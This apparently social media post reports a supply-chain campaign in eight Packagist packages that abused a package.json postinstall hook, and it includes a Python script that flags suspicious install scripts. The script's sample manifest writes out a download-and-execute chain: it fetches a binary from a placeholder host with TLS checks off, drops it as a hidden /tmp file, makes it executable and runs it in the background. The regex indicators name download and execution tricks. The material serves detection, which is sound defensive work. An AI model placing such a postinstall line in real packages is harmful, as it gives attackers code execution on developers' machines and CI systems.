VMTECH · INSTAGRAM

Packagist: malicious Linux binary in 8 packages via package.json


Colleagues, please note: a malicious campaign has been found affecting eight packages on Packagist.

Socket reports that a postinstall script was added to package.json that downloads a Linux binary from GitHub Releases, saves it to /tmp/.sshd, sets permissions on it and launches it in the background, with TLS verification disabled for the download. The infected versions have been removed.

The attack is cross-ecosystem: the payload lives in package.json rather than in Composer metadata, so it shows up across many repositories and workflows and slips past scanners that only inspect Composer packages.

Why this matters: the script runs during installation, so it amounts to remote code execution on whatever performs the install, locally or in CI.

Recommendations: inspect package.json, its lifecycle scripts and your workflows; pin versions; and block postinstall scripts.
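As an added example (not Socket's tooling or code from this post), a minimal audit of package.json lifecycle scripts for the fetch, write-to-/tmp, chmod, background-launch chain described above; the indicator patterns and the two sample manifests are constructed here:

```python
"""Flag package.json lifecycle scripts that download and execute something at install time."""
import json
import re
from pathlib import Path

# npm runs these hooks automatically during install; they are the usual foothold.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare",
                   "prepublish", "preprepare", "postprepare"}

# Constructed heuristics: each (label, regex) covers one link of a fetch-write-exec chain.
INDICATORS = [
    ("remote-download", re.compile(r"\b(curl|wget|Invoke-WebRequest)\b")),
    ("tls-verify-disabled", re.compile(
        r"(\s-k\b|--insecure|--no-check-certificate|"
        r"NODE_TLS_REJECT_UNAUTHORIZED\s*=\s*0|rejectUnauthorized\s*:\s*false)")),
    ("hidden-tmp-file", re.compile(r"/tmp/\.[\w.-]+")),      # dotfile dropped in /tmp
    ("chmod-exec", re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")),
    ("background-exec", re.compile(r"(\bnohup\b|&\s*$|\bsetsid\b|\bdisown\b)")),
    ("decode-and-eval", re.compile(r"(base64\s+-d|\beval\b)")),
]

def audit_manifest(text: str) -> list[tuple[str, str]]:
    """Return (hook, indicator) pairs for every lifecycle script that trips an indicator."""
    try:
        scripts = json.loads(text).get("scripts", {})
    except (ValueError, AttributeError):   # not JSON, or not an object
        return []
    hits = []
    for hook, cmd in scripts.items():
        if hook not in LIFECYCLE_HOOKS or not isinstance(cmd, str):
            continue
        hits.extend((hook, label) for label, rx in INDICATORS if rx.search(cmd))
    return hits

def audit_tree(root: Path) -> dict[str, list[tuple[str, str]]]:
    """Audit every package.json under root (the repo, vendor/, node_modules/)."""
    return {str(p): h for p in root.rglob("package.json")
            if (h := audit_manifest(p.read_text(encoding="utf-8", errors="replace")))}

# Constructed sample manifests: a benign build hook, and one mirroring the reported chain
# (placeholder host; no real payload).
BENIGN = json.dumps({"scripts": {"postinstall": "node scripts/build.js", "test": "jest"}})
SUSPICIOUS = json.dumps({"scripts": {
    "postinstall": "curl -k -fsSL https://example.invalid/rel/bin -o /tmp/.svc "
                   "&& chmod +x /tmp/.svc && /tmp/.svc &"}})

if __name__ == "__main__":
    for name, manifest in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, audit_manifest(manifest))
```

Run `audit_tree(Path("."))` in a checkout or CI job to list every manifest that trips an indicator, and treat any hit as a reason to inspect the script by hand.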

How are you hardening your supply chain?

#cybersecurity #supplychain #DevSecOps #OpenSource
